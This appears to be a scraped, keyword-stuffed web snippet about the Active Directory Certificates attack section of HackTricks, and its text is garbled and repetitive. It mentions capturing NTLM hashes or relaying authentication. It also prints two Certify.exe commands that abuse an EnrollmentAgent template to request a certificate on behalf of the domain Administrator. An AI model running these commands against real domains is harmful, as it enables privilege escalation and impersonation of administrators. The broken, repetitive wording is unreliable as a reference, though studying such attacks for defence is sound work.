The AD Certificates section on HackTricks breaks down the complex world of PKI into actionable attack vectors:
Allows remote attackers to capture NTLM hashes or relay authentication. hacktricks adcs
Certify.exe request /ca:CA\CA /template:EnrollmentAgent Certify.exe request /ca:CA\CA /template:User /onbehalfof:CONTOSO\Administrator The AD Certificates section on HackTricks breaks down